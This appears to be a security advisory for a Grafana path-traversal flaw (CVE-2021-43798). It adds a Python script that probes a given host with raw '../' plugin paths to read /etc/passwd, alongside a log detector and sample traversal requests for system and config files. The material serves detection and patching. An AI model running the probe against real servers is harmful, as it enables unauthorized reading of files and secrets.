PT-2021-7636 · Grafana+2
Jordy Versmissen
·
Published
2021-11-09
·
Updated
2026-03-23
·
CVE-2021-43798
CVSS v2.0
7.8
High
| Vector | AV:N/AC:L/Au:N/C:C/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
Grafana versions 8.0.0-beta1 through 8.3.0
Description
Grafana is vulnerable to a directory traversal vulnerability that lets an unauthenticated attacker read local files. The vulnerable URL path is:
<grafana host url>/public/plugins/<plugin-id>/, where <plugin-id> is the ID of any installed plugin. Numerous reports indicate a resurgence of exploitation attempts, with attackers targeting systems internationally, including critical infrastructure. The vulnerability allows unauthorized access to local files, potentially exposing sensitive data. It is exploitable with a single crafted HTTP GET request: the path after /public/plugins/<plugin-id>/ carries "../" segments that the server does not normalize, so any file readable by the Grafana process can be fetched without authentication.
Recommendations
Upgrade Grafana to version 8.0.7, 8.1.8, 8.2.7, or 8.3.1 as soon as possible. If upgrading is not feasible, put a reverse proxy in front of Grafana that normalizes the request path before forwarding it, such as the normalize_path setting in Envoy. A proxy only protects the proxied route: the Grafana listener itself must not remain reachable directly.
Exploit
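The probe and the matching log check, as an added example that is not part of this advisory and not Grafana's or Envoy's code. It builds the raw traversal path under /public/plugins/<plugin-id>/ described above and sends it without client-side normalization, classifies the response, and flags the same pattern in reverse-proxy access logs. The plugin IDs are assumed to be bundled with a default Grafana 8 install, and the log lines are constructed for this example.

```python
"""Added example for CVE-2021-43798 (Grafana /public/plugins/<plugin-id>/ traversal).

Assumptions not stated on the advisory page: the plugin IDs below ship with a
default Grafana 8 install; SAMPLE_LOG is constructed for this example.
"""
import http.client
import re
from urllib.parse import unquote

# Bundled Grafana 8 panel/datasource plugin IDs (assumed present on a default install).
DEFAULT_PLUGIN_IDS = ["alertlist", "annolist", "graph", "table", "prometheus", "mysql"]

# /etc/passwd is the harmless proof: present on every Linux host, recognisable first line.
PASSWD_MARKER = re.compile(r"^root:[^:]*:0:0:", re.M)


def build_probe_path(plugin_id: str, target: str = "/etc/passwd", depth: int = 8) -> str:
    """Raw request path for one plugin ID.

    The "../" segments must climb from the plugin directory to "/"; extra
    segments are harmless because path resolution stops at the root.
    """
    return f"/public/plugins/{plugin_id}/" + "../" * depth + target.lstrip("/")


def looks_vulnerable(status: int, body: bytes) -> bool:
    """A 200 whose body is a passwd file is a hit.

    An unrelated 200 (e.g. an HTML login page) does not match the marker, so
    it is not reported as a false positive.
    """
    return status == 200 and PASSWD_MARKER.search(body.decode("utf-8", "replace")) is not None


def probe_host(host: str, port: int = 3000, plugin_ids=DEFAULT_PLUGIN_IDS, timeout: float = 5.0):
    """Send the raw path with http.client so the "../" segments are NOT collapsed
    client-side (curl needs --path-as-is for the same reason).
    Returns the first plugin ID that worked, or None."""
    for pid in plugin_ids:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", build_probe_path(pid))
            resp = conn.getresponse()
            if looks_vulnerable(resp.status, resp.read()):
                return pid
        finally:
            conn.close()
    return None


# --- detection side: flag traversal attempts in a reverse-proxy access log ---

PLUGIN_PATH = re.compile(r'"(?:GET|HEAD)\s+(/public/plugins/[^\s"]*)')


def is_traversal_request(log_line: str) -> bool:
    """True when the request path under /public/plugins/ contains a ".." segment
    after percent-decoding (covers %2e%2e and double-encoded %252e%252e)."""
    m = PLUGIN_PATH.search(log_line)
    if not m:
        return False
    path = m.group(1).split("?", 1)[0]
    for _ in range(2):  # decode twice to catch double encoding
        path = unquote(path)
    return any(seg == ".." for seg in path.split("/"))


# Constructed sample access-log lines (nginx combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2021:10:01:02 +0000] "GET /public/plugins/graph/module.js HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Nov/2021:10:01:09 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1842 "-" "python-requests/2.26"
203.0.113.7 - - [09/Nov/2021:10:01:10 +0000] "GET /public/plugins/mysql/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 9021 "-" "curl/7.79"
""".splitlines()


def suspicious_lines(lines):
    """Return only the log lines that carry a traversal attempt."""
    return [line for line in lines if is_traversal_request(line)]


if __name__ == "__main__":
    import sys
    for hit in suspicious_lines(SAMPLE_LOG):
        print("TRAVERSAL:", hit)
    if len(sys.argv) > 1:  # python3 probe.py <host> [port]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 3000
        print("vulnerable via plugin:", probe_host(sys.argv[1], port))
```

The probe uses http.client rather than a higher-level library precisely so the path reaches the wire unchanged; a client that collapses "../" before sending would report a vulnerable host as clean. The log check decodes twice because a proxy that applies normalize_path still leaves the original request in its own log, and that is the record worth alerting on.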
Fix
Weakness Enumeration
Path traversal
Affected Products
Alt Linux
Grafana
Suse